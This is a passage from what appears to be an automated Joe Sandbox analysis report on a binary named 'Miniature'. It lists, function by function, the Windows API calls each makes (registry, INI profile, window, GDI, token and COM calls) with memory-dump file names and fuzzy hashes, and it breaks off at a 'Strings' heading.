                                                    • Part of subcall function 0101147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101040D,?,?), ref: 01011491
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101075D
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0101079C
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 010107E3
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 0101080F
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0101081C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3440857362-0
                                                  • Opcode ID: 3801ed46e7d01ac94af0568e1a45a482c1da6ca9865be81d4f6fe826b3ff8da9
                                                  • Instruction ID: a6c7a7a39490d976b79001cd6157020147bb6f1b18f72348de9b7b6cf276ed92
                                                  • Opcode Fuzzy Hash: 3801ed46e7d01ac94af0568e1a45a482c1da6ca9865be81d4f6fe826b3ff8da9
                                                  • Instruction Fuzzy Hash: 82517871208305AFD714EF68CC81E6AB7E8BF84304F00891DF9D587295DB39E945DB52
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FFEC62
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FFEC8B
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FFECCA
                                                    • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                    • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FFECEF
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FFECF7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: 55575f8471e0426b7484c5e2734f6feedce66cb036c30552693216b94239c37b
                                                  • Instruction ID: d55af945c2366f6cd91b1902237e53daa48a99199cb4b48f06eb14cde3bb9605
                                                  • Opcode Fuzzy Hash: 55575f8471e0426b7484c5e2734f6feedce66cb036c30552693216b94239c37b
                                                  • Instruction Fuzzy Hash: BB513739A00209DFDF11EF64C981EAEBBF5EF49314B148099E949AB361DB35AD01EB50
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0eae21c429e3ef28b9228b16fb3698576eda04b8a85d67d259ace2687c21e5de
                                                  • Instruction ID: b3c048e1398f6c1ca7228d69f823c704c148815d0587e19630ff382fa171179e
                                                  • Opcode Fuzzy Hash: 0eae21c429e3ef28b9228b16fb3698576eda04b8a85d67d259ace2687c21e5de
                                                  • Instruction Fuzzy Hash: 7641D435A02294EFE760DE68CC44FAABBF4FB09320F140195F997A72D9C7789A41DB50
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00F92727
                                                  • ScreenToClient.USER32(010577B0,?), ref: 00F92744
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00F92769
                                                  • GetAsyncKeyState.USER32(00000002), ref: 00F92777
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: c6006184b5456655c173c0df081de512778123c05b3d47d7dd8f5420de2fcd3b
                                                  • Instruction ID: c2141aede749939301bb14e5a9a5db497a719abfade62344873087def69c99b0
                                                  • Opcode Fuzzy Hash: c6006184b5456655c173c0df081de512778123c05b3d47d7dd8f5420de2fcd3b
                                                  • Instruction Fuzzy Hash: C841603590411AFFDF659EA8C948FE9BB74FB05330F208319F868A2294C7359D50EB91
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00FE95E8
                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00FE9692
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FE969A
                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00FE96A8
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FE96B0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: 920f116794ad6785f6c344316403a0018376ed8b54bf5e19836d529b4ff23efe
                                                  • Instruction ID: 8fe061afd4546894dc5a224d6ade76da2923db8358a5652a20745a7b2d08e777
                                                  • Opcode Fuzzy Hash: 920f116794ad6785f6c344316403a0018376ed8b54bf5e19836d529b4ff23efe
                                                  • Instruction Fuzzy Hash: CF31EE71904259EFDF20CF69D94CA9E7BB5FB44325F20421AF824AB1D4C3B09910EBA0
                                                  APIs
                                                    • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0101B804
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0101B829
                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0101B841
                                                  • GetSystemMetrics.USER32(00000004), ref: 0101B86A
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0100155C,00000000), ref: 0101B888
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 2294984445-0
                                                  • Opcode ID: 725b4091271a4b18963158e7b8ae80629279cffb90db761eea9ff6bd4e8ce28f
                                                  • Instruction ID: edb0da3ecb4cde6b186b989530b4e177960e84b54ed8ae7b7a02b637bd7a455f
                                                  • Opcode Fuzzy Hash: 725b4091271a4b18963158e7b8ae80629279cffb90db761eea9ff6bd4e8ce28f
                                                  • Instruction Fuzzy Hash: EC21A371910225AFDB649E3CCC08B6A3BB4FB05B24F244768FDA5D31D8D7398810CB80
                                                  APIs
                                                  • IsWindow.USER32(00000000), ref: 01006159
                                                  • GetForegroundWindow.USER32 ref: 01006170
                                                  • GetDC.USER32(00000000), ref: 010061AC
                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 010061B8
                                                  • ReleaseDC.USER32(00000000,00000003), ref: 010061F3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$ForegroundPixelRelease
                                                  • String ID:
                                                  • API String ID: 4156661090-0
                                                  • Opcode ID: af63d0b355a03fcdd9e744f94862a6e0f359ff64ddeae354777a3756803d1e2d
                                                  • Instruction ID: 3d0c296c87d561be59b94adcfd719965c9624ecc7ecb27f7192734b892ff1a08
                                                  • Opcode Fuzzy Hash: af63d0b355a03fcdd9e744f94862a6e0f359ff64ddeae354777a3756803d1e2d
                                                  • Instruction Fuzzy Hash: BC21D875A002049FE720EF64DC88AAABBF5EF48310F148479F98AD7356CB35AC01DB90
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F91729
                                                  • SelectObject.GDI32(?,00000000), ref: 00F91738
                                                  • BeginPath.GDI32(?), ref: 00F9174F
                                                  • SelectObject.GDI32(?,00000000), ref: 00F91778
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: b01013a82ae3ea4ccffc159725397337c3451ef81b068781a6db5ab370e1b79d
                                                  • Instruction ID: 731712be282c5b89177bf477d023bfe073c3917d93f86b11f3337b2bbd09c725
                                                  • Opcode Fuzzy Hash: b01013a82ae3ea4ccffc159725397337c3451ef81b068781a6db5ab370e1b79d
                                                  • Instruction Fuzzy Hash: E121B330C0030AEFEF319F64D944B7A7BA8F710321F644226F89596298D77B9895EB91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 242fa7146fe378d34bb751338772e083f52dd9213ee8e1dbb8b0b3adafdd1956
                                                  • Instruction ID: 933a50957fbf53d98ebd1c339b87d07e5f283738ebad7a0231c03f9672f270cb
                                                  • Opcode Fuzzy Hash: 242fa7146fe378d34bb751338772e083f52dd9213ee8e1dbb8b0b3adafdd1956
                                                  • Instruction Fuzzy Hash: FE01F563A001193BD21065139E92FFB731DBA24394F044129FE069B301E768DF12A6E1
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00FF5075
                                                  • __beginthreadex.LIBCMT ref: 00FF5093
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00FF50A8
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FF50BE
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FF50C5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                  • String ID:
                                                  • API String ID: 3824534824-0
                                                  • Opcode ID: 4304cd774a5ec5b01d79f50dd2f6ed9291fc1e48c6922a4a7bc5839df07ae992
                                                  • Instruction ID: 039346005e33e08c2317f0cc8841ff852f2ad2af24970f1857baa1ef3a674701
                                                  • Opcode Fuzzy Hash: 4304cd774a5ec5b01d79f50dd2f6ed9291fc1e48c6922a4a7bc5839df07ae992
                                                  • Instruction Fuzzy Hash: C411447290470DBFC7208FA89C08AAB7FACAF45320F644256FA18D3355DA7A890097F0
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FE8E3C
                                                  • GetLastError.KERNEL32(?,00FE8900,?,?,?), ref: 00FE8E46
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00FE8900,?,?,?), ref: 00FE8E55
                                                  • HeapAlloc.KERNEL32(00000000,?,00FE8900,?,?,?), ref: 00FE8E5C
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FE8E73
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: 3c50a08bb025e1a867b11ac411185a697b67a5f487c411c1b74c1774be65eaf6
                                                  • Instruction ID: 1616072e476b7ef378206ef37f8a52b648ff4d937111053c4853bae2cdd3c03c
                                                  • Opcode Fuzzy Hash: 3c50a08bb025e1a867b11ac411185a697b67a5f487c411c1b74c1774be65eaf6
                                                  • Instruction Fuzzy Hash: A8016D71601344BFDB305FA6DC48D6B7BADEF893A4B240569F889C2214DB329C01DB60
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF581B
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FF5829
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5831
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FF583B
                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5877
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: f32ce633e4906dcc21c80c6edc692fd0cbb28a3fc6ad03c0652c520b645285ef
                                                  • Instruction ID: 6c4d7792da18d5c9d07095fff8f4844ad9717127eae6b861155aa236eaf9bd49
                                                  • Opcode Fuzzy Hash: f32ce633e4906dcc21c80c6edc692fd0cbb28a3fc6ad03c0652c520b645285ef
                                                  • Instruction Fuzzy Hash: 8301DE31C01A1DDBDF209FE4E849AEDBBB8FF0CB10F200156EA42B2158CB398510DBA1
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FE8CDE
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FE8CE8
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FE8CF7
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FE8CFE
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FE8D14
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: e526a91aeb177d681b522c6bc30cf15ad33cc996b7786d025ddd550210a524b9
                                                  • Instruction ID: 013d2f4ad317e528cc6cefbff6b5d7836b511ae9b3e30ac50d7ba5efee016892
                                                  • Opcode Fuzzy Hash: e526a91aeb177d681b522c6bc30cf15ad33cc996b7786d025ddd550210a524b9
                                                  • Instruction Fuzzy Hash: 6BF04F35600304AFEB311FA59CC9EA73BADEF897A4F204525F989C6194CB669C41EB60
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FE8D3F
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D49
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D58
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D5F
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D75
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: cf2aca22bd8370d0e3bac0be19580fe42dde2dfcabbed8fe31746d9f00b64cad
                                                  • Instruction ID: e16aa1704a8cacfabda5f2151d8d1b6aecd5d02d34259a68420c39ca8b1267f8
                                                  • Opcode Fuzzy Hash: cf2aca22bd8370d0e3bac0be19580fe42dde2dfcabbed8fe31746d9f00b64cad
                                                  • Instruction Fuzzy Hash: DEF0AF30200344AFEB311FA5EC88E673BACEF497A4F240115F988C2284CB669D41EB60
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00FECD90
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FECDA7
                                                  • MessageBeep.USER32(00000000), ref: 00FECDBF
                                                  • KillTimer.USER32(?,0000040A), ref: 00FECDDB
                                                  • EndDialog.USER32(?,00000001), ref: 00FECDF5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: d0e3882f3dadc7d711083ccd7e416dde5d99fab2ca0f169f3f247a83d601c30e
                                                  • Instruction ID: 000a1e6fc659a46b84557c33fd4f0ec9f3cf31014ea7497bfaa7f1beadbdde01
                                                  • Opcode Fuzzy Hash: d0e3882f3dadc7d711083ccd7e416dde5d99fab2ca0f169f3f247a83d601c30e
                                                  • Instruction Fuzzy Hash: 1C01D131900748ABEB305F21DC4EFA67BB8FB04711F100669F6D2A10D5DBFAA9499BC1
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 00F9179B
                                                  • StrokeAndFillPath.GDI32(?,?,00FCBBC9,00000000,?), ref: 00F917B7
                                                  • SelectObject.GDI32(?,00000000), ref: 00F917CA
                                                  • DeleteObject.GDI32 ref: 00F917DD
                                                  • StrokePath.GDI32(?), ref: 00F917F8
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: fdb5b80727568b3c69574aae76bbf831b60424846963ee8f8abca9b1281e597b
                                                  • Instruction ID: e0277cfb8d8367eb9e1191beb7df6ea9c8eee39d049c9658bd6d912798fb950b
                                                  • Opcode Fuzzy Hash: fdb5b80727568b3c69574aae76bbf831b60424846963ee8f8abca9b1281e597b
                                                  • Instruction Fuzzy Hash: B5F0EC3004430AEBFB355F66E84C76A3FA4F710326F648224F4AA552E8C73E4995EF11
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00FFCA75
                                                  • CoCreateInstance.OLE32(01023D3C,00000000,00000001,01023BAC,?), ref: 00FFCA8D
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                  • CoUninitialize.OLE32 ref: 00FFCCFA
                                                  Strings
                                                  Memory Dump Source
